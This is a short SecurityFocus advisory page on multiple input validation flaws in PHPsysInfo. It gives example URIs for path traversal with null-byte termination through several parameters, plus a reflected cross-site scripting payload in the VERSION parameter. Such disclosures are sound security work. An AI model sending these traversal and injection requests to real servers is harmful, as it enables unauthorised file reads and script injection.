Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

PHPsysInfo Multiple Input Validation Vulnerabilities

No exploit is required.

Example URI have been provided:

http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00
http://www.example.com/index.php?_SERVER[HTTP_ACCEPT_LANGUAGE]=../../README%00&lng=../../README%00

http://www.example.com/index.php?sensor_program=lmsensors.inc.php/../../README%00

http://www.example.com/index.php?VERSION=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E







 

Privacy Statement
Copyright 2009, SecurityFocus